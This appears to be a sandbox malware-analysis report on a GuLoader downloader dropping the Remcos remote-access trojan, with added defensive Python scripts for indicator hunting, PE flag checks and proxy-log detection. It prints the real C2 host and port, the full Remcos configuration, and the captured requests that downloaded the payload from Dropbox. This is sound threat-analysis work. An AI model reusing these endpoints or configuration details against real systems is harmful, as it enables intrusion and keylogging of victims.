Windows Analysis Report
25FC004658_Femetagershusenes.exe

Overview

General Information

Sample name: 25FC004658_Femetagershusenes.exe
Analysis ID: 1650816
MD5: 77221f5f2a4984872389759b83446a62
SHA1: 07c1d4795c8ec52dff45be198abde62c331ded59
SHA256: d67a5911a1cca695a8e3514e1155c6cc8ace4c1a6b96daf563f6ae3134c6d588
Tags: exe, user-threatcat_ch

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Classification chart (graphic not reproduced). Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Verdict scale: clean, suspicious, malicious.
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection

Source: parosh.didns.ru Avira URL Cloud: Label: malware
Source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["parosh.didns.ru:3011:1"], "Assigned name": "PAROSH NEW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "psh983mn-LGLX6H", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "polshmy"}
Source: 25FC004658_Femetagershusenes.exe VirusTotal: Detection: 12%
Source: Yara match File source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR
Source: IMCCPHR.exe, 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----
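The extracted Remcos configuration above is the most actionable part of this report: it names the C2 endpoint, the mutex, the persistence locations and the keylog drop. The following script turns that blob into hunting indicators and runs them over endpoint telemetry. It is an added example, not code from the Joe Sandbox report or from Remcos. It assumes how Remcos composes its artefacts from the config fields (that "Keylog path": "AppData" plus the keylog folder and file becomes %APPDATA%\polshmy\logs.dat, and that "Setup HKCU\Run" / "Setup HKLM\Run" mean a value under Software\Microsoft\Windows\CurrentVersion\Run); the telemetry events are constructed for the example.

```python
r"""Turn the Remcos configuration extracted above into hunting indicators.

Added example, not code from the Joe Sandbox report or from Remcos. The input
is the configuration object the report's Malware Configuration Extractor
printed, trimmed to the fields used here. The path and registry layout
(%APPDATA%\polshmy\logs.dat, values under
Software\Microsoft\Windows\CurrentVersion\Run) is assumed for this example.
"""
import json

# Constructed input: fields copied from the report's extracted configuration.
REMCOS_CONFIG_JSON = r'''{
  "Host:Port:Password": ["parosh.didns.ru:3011:1"],
  "Assigned name": "PAROSH NEW",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Copy file": "remcos.exe",
  "Copy folder": "Remcos",
  "Mutex": "psh983mn-LGLX6H",
  "Keylog flag": "1",
  "Keylog path": "AppData",
  "Keylog folder": "polshmy",
  "Keylog file": "logs.dat"
}'''

# Assumed meaning of the base-folder names used in the config.
BASE_DIRS = {"AppData": "%APPDATA%", "Temp": "%TEMP%",
             "Application path": "<directory of the running executable>"}
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"


def load_config(text=REMCOS_CONFIG_JSON):
    return json.loads(text)


def parse_c2(entries):
    """Split 'host:port:password' entries; rsplit keeps the hostname intact."""
    c2 = []
    for entry in entries:
        parts = entry.rsplit(":", 2)
        if len(parts) != 3:
            raise ValueError(f"unexpected C2 entry: {entry!r}")
        host, port, password = parts
        c2.append((host.lower(), int(port), password))
    return c2


def build_indicators(cfg):
    """Derive network and on-host indicators from the parsed config."""
    keylog_suffix = None
    if cfg.get("Keylog flag") == "1":
        keylog_suffix = "\\" + cfg["Keylog folder"] + "\\" + cfg["Keylog file"]
    base = BASE_DIRS.get(cfg.get("Keylog path"), cfg.get("Keylog path", ""))
    run_keys = [hive + "\\" + RUN_KEY for hive in ("HKCU", "HKLM")
                if cfg.get(f"Setup {hive}\\Run") == "Enable"]
    return {
        "c2": parse_c2(cfg["Host:Port:Password"]),
        "mutex": cfg["Mutex"],
        "keylog_file": base + keylog_suffix if keylog_suffix else None,
        "keylog_suffix": keylog_suffix,
        "run_keys": run_keys,
        "copy_name": cfg["Copy file"].lower(),
    }


def hunt(indicators, events):
    """Match endpoint events (dicts with type net/mutex/reg/file) against the indicators."""
    c2 = {(host, port) for host, port, _ in indicators["c2"]}
    hits = []
    for ev in events:
        kind = ev["type"]
        if kind == "net" and (ev["dst"].lower(), ev["port"]) in c2:
            hits.append(("c2_connection", ev))
        elif kind == "mutex" and ev["name"] == indicators["mutex"]:
            hits.append(("mutex", ev))
        elif kind == "reg" and ev["data"].lower().endswith(indicators["copy_name"]) \
                and any(ev["key"].lower().startswith(k.lower()) for k in indicators["run_keys"]):
            hits.append(("run_key", ev))
        elif kind == "file" and indicators["keylog_suffix"] \
                and ev["path"].lower().endswith(indicators["keylog_suffix"].lower()):
            hits.append(("keylog_file", ev))
    return hits


# Constructed telemetry (not from the report): one benign and four matching events.
SAMPLE_EVENTS = [
    {"type": "net", "dst": "www.dropbox.com", "port": 443},
    {"type": "net", "dst": "PAROSH.didns.ru", "port": 3011},
    {"type": "mutex", "name": "psh983mn-LGLX6H"},
    {"type": "reg", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Remcos", "data": r"C:\Users\user\AppData\Roaming\Remcos\remcos.exe"},
    {"type": "file", "path": r"C:\Users\user\AppData\Roaming\polshmy\logs.dat"},
]

if __name__ == "__main__":
    for reason, ev in hunt(build_indicators(load_config()), SAMPLE_EVENTS):
        print(reason, ev)
```

The C2 password ("1" here) is the shared secret for the Remcos channel, not a credential to hunt for; the host:port pair, the mutex and the keylog path are the stable indicators. Note that "Install flag" is "Disable" in this config, so the Run-key indicator may not fire on every host even though the Sigma rule above matched in the sandbox.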

Exploits

Source: Yara match File source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR
Source: 25FC004658_Femetagershusenes.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 162.125.6.18:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.125.6.15:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: 25FC004658_Femetagershusenes.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 0_2_00405974
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004064C6 FindFirstFileW,FindClose, 0_2_004064C6
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
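The two static PE information lines above are worth reading together: RELOCS_STRIPPED in the COFF characteristics and DYNAMIC_BASE in the DLL characteristics. DYNAMIC_BASE only requests a randomised image base; without a base-relocation table the loader has nothing to patch, so the image is mapped at its preferred ImageBase and the flag buys no ASLR. The parser below checks that combination. It is an added example, not code from the report; the header bytes it parses are constructed here (a bare PE32 header with the flag values the report lists, no sections), not the sample's own bytes.

```python
"""Check whether the PE flags listed above actually give the image ASLR.

Added example, not from the Joe Sandbox report. Reads COFF Characteristics,
DllCharacteristics and the base-relocation data directory from a PE32 header
and reports whether DYNAMIC_BASE can be honoured. The image bytes are
constructed for the example, not taken from the sample.
"""
import struct

IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_LINE_NUMS_STRIPPED = 0x0004
IMAGE_FILE_LOCAL_SYMS_STRIPPED = 0x0008
IMAGE_FILE_32BIT_MACHINE = 0x0100
DLL_DYNAMIC_BASE = 0x0040
DLL_NX_COMPAT = 0x0100
DLL_NO_SEH = 0x0400
DLL_TERMINAL_SERVER_AWARE = 0x8000
PE32_MAGIC = 0x10B
BASERELOC_DIR = 5  # index of the base-relocation entry in the data directory


def pe_flags(data):
    """Return the two flag words and the size of the .reloc directory of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    characteristics = struct.unpack_from("<H", data, coff + 18)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != PE32_MAGIC:
        raise ValueError("only PE32 handled here")
    dll_characteristics = struct.unpack_from("<H", data, opt + 70)[0]
    _rva, reloc_size = struct.unpack_from("<II", data, opt + 96 + BASERELOC_DIR * 8)
    return {"characteristics": characteristics,
            "dll_characteristics": dll_characteristics,
            "reloc_dir_size": reloc_size}


def aslr_assessment(flags):
    """'aslr' only when the flag is set AND the loader can actually relocate the image."""
    wants_aslr = bool(flags["dll_characteristics"] & DLL_DYNAMIC_BASE)
    relocatable = (not flags["characteristics"] & IMAGE_FILE_RELOCS_STRIPPED
                   and flags["reloc_dir_size"] > 0)
    if wants_aslr and relocatable:
        return "aslr"
    if wants_aslr:
        return "dynamic_base_without_relocations"
    return "no_aslr"


def build_pe32_header(characteristics, dll_characteristics, reloc_size):
    """Constructed minimal PE32 header for the example: DOS stub, COFF header,
    224-byte optional header, no sections."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, characteristics)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    struct.pack_into("<II", opt, 96 + BASERELOC_DIR * 8,
                     0x1000 if reloc_size else 0, reloc_size)
    return dos + b"PE\0\0" + coff + bytes(opt)


# Flag combination exactly as the report lists it for the sample.
SAMPLE_LIKE = build_pe32_header(
    IMAGE_FILE_RELOCS_STRIPPED | IMAGE_FILE_EXECUTABLE_IMAGE |
    IMAGE_FILE_LINE_NUMS_STRIPPED | IMAGE_FILE_LOCAL_SYMS_STRIPPED |
    IMAGE_FILE_32BIT_MACHINE,
    DLL_DYNAMIC_BASE | DLL_NX_COMPAT | DLL_NO_SEH | DLL_TERMINAL_SERVER_AWARE,
    reloc_size=0)
# A normally linked image for comparison.
RELOCATABLE = build_pe32_header(
    IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE,
    DLL_DYNAMIC_BASE | DLL_NX_COMPAT, reloc_size=0x200)

if __name__ == "__main__":
    print(aslr_assessment(pe_flags(SAMPLE_LIKE)))
    print(aslr_assessment(pe_flags(RELOCATABLE)))
```

On a real file the same fields are available through pefile as pe.FILE_HEADER.Characteristics, pe.OPTIONAL_HEADER.DllCharacteristics and the BASERELOC entry of pe.OPTIONAL_HEADER.DATA_DIRECTORY. A fixed image base is mainly of interest when the GuLoader stage starts unpacking in place, since addresses inside the stub are then predictable across runs.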

Networking

Source: Malware configuration extractor URLs: parosh.didns.ru
Source: Joe Sandbox View IP Address: 162.125.6.15 162.125.6.15
Source: Joe Sandbox View IP Address: 162.125.6.18 162.125.6.18
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49725 -> 162.125.6.18:443
Source: global traffic HTTP traffic detected:
GET /scl/fi/0jhi0626x7zqfgid1v9te/UjzebvskPbXnryFB92.bin?rlkey=65dc2nu7arz5szq4evadjxcxz&st=xm70zo43&dl=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Host: www.dropbox.com
Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
GET /cd/0/get/CmsIyjcNSqE9pfci-uOQ5iPpUwthde2j5Gu-YHxpenRoUwO-5aFF-26QH3jJ5w1vsnC9n0X7MK9TbekEndvfLddUc1vukyol79nTDWgL_oeOOnkft5YyRStzi2xNvs2hekNlJcWK0ut_zuTPuhb46702/file?dl=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Cache-Control: no-cache
Host: uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com
Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; font-src https://* data: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://apis.google.com/js/ 'nonce-GtDgp8MmJsd5MzF8YgyAEsxNpZM=' ; frame-ancestors 'self' https://*.dropbox.com ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com 
https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
Source: IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: opbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: www.dropbox.com
Source: global traffic DNS traffic detected: DNS query: uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com
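The HTTP and DNS entries above show the GuLoader retrieval chain: a Dropbox share link fetched with dl=1, the redirect target on *.dl.dropboxusercontent.com, and a Firefox User-Agent sent without the Accept and Accept-Language headers a real browser always adds. The script below runs that logic over a web-proxy log. It is an added example, not from the Joe Sandbox report: the log lines are constructed in a simple JSON-lines format (the two flagged requests copy the host, path and headers the report captured, with the long download token replaced by a placeholder; the benign lines are invented), and the "browser User-Agent without browser headers" rule is this example's own heuristic.

```python
"""Flag the Dropbox payload-retrieval chain captured above in a web-proxy log.

Added example, not from the Joe Sandbox report. The log is constructed for
the example as JSON lines, one request per line.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

FIREFOX_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) "
              "Gecko/20100101 Firefox/134.0")

# Constructed proxy log. Requests 1-2 mirror the report's capture (download
# token shortened to a placeholder); requests 3-4 are invented benign traffic:
# a browser opening a share page, and a browser downloading an installer.
PROXY_LOG = "\n".join(json.dumps(r) for r in [
    {"ts": 100, "client": "192.168.2.5",
     "url": "https://www.dropbox.com/scl/fi/0jhi0626x7zqfgid1v9te/UjzebvskPbXnryFB92.bin"
            "?rlkey=65dc2nu7arz5szq4evadjxcxz&st=xm70zo43&dl=1",
     "headers": {"User-Agent": FIREFOX_UA, "Cache-Control": "no-cache"}},
    {"ts": 101, "client": "192.168.2.5",
     "url": "https://uc4e0071989a2933c6cc78579974.dl.dropboxusercontent.com"
            "/cd/0/get/PLACEHOLDERTOKEN/file?dl=1",
     "headers": {"User-Agent": FIREFOX_UA, "Cache-Control": "no-cache",
                 "Connection": "Keep-Alive"}},
    {"ts": 200, "client": "192.168.2.7",
     "url": "https://www.dropbox.com/scl/fi/abc123/report.pdf?rlkey=k1&dl=0",
     "headers": {"User-Agent": FIREFOX_UA, "Accept": "text/html,*/*;q=0.8",
                 "Accept-Language": "en-US,en;q=0.5",
                 "Referer": "https://www.dropbox.com/"}},
    {"ts": 300, "client": "192.168.2.9",
     "url": "https://www.dropbox.com/scl/fi/def456/setup.exe?rlkey=k2&dl=1",
     "headers": {"User-Agent": FIREFOX_UA, "Accept": "*/*",
                 "Accept-Language": "en-US"}},
])

BROWSER_UA = re.compile(r"(Firefox|Chrome|Safari|Edg)/\d")
BROWSER_HEADERS = ("accept", "accept-language")
PAYLOAD_EXT = (".bin", ".exe", ".dll", ".dat")


def parse_log(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def request_findings(req):
    """Per-request signals; each is weak on its own."""
    u = urlsplit(req["url"])
    host = (u.hostname or "").lower()
    query = parse_qs(u.query)
    headers = {k.lower(): v for k, v in req["headers"].items()}
    findings = []
    if BROWSER_UA.search(headers.get("user-agent", "")) and \
            not all(h in headers for h in BROWSER_HEADERS):
        findings.append("browser_ua_without_browser_headers")
    if host == "www.dropbox.com" and u.path.startswith("/scl/fi/") and \
            query.get("dl") == ["1"] and u.path.lower().endswith(PAYLOAD_EXT):
        findings.append("share_link_forced_download")
    if host.endswith(".dl.dropboxusercontent.com") and u.path.startswith("/cd/0/get/"):
        findings.append("dropboxusercontent_fetch")
    return findings


def correlate(requests, window=60):
    """Alert when one client chains a forced share-link download to the
    dropboxusercontent fetch within `window` seconds from a client that only
    pretends to be a browser."""
    alerts = []
    by_client = {}
    for r in requests:
        by_client.setdefault(r["client"], []).append(r)
    for client, reqs in by_client.items():
        flagged = sorted(((r["ts"], set(request_findings(r))) for r in reqs),
                         key=lambda item: item[0])
        for i, (ts, found) in enumerate(flagged):
            if "share_link_forced_download" not in found:
                continue
            reasons = set(found)
            for ts2, found2 in flagged[i + 1:]:
                if ts2 - ts > window:
                    break
                reasons |= found2
            if {"dropboxusercontent_fetch", "browser_ua_without_browser_headers"} <= reasons:
                alerts.append({"client": client, "ts": ts, "reasons": sorted(reasons)})
    return alerts


if __name__ == "__main__":
    for alert in correlate(parse_log(PROXY_LOG)):
        print(alert)
```

The share-link pattern alone is noisy in any environment where Dropbox is used, which is why the alert requires the follow-on object fetch and the header anomaly from the same client. If the proxy logs the originating process, "not a browser binary" is a stronger version of the header check.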
Source: IMCCPHR.exe, 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: 25FC004658_Femetagershusenes.exe, Funktionsafprvningerne.exe.0.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://a.sprig.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/gsi/client
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.login.yahoo.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com/js/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://app.hellofax.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://app.hellosign.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://canny.io/sdk.js
Source: IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cfl.dropboxstatic.com/static/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758613270.0000000009124000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dl-web.dropbox.com/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/fsip/
Source: IMCCPHR.exe, 00000005.00000003.3709171005.0000000009122000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3726584807.0000000009121000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000003.3708985797.0000000009108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/fsip/
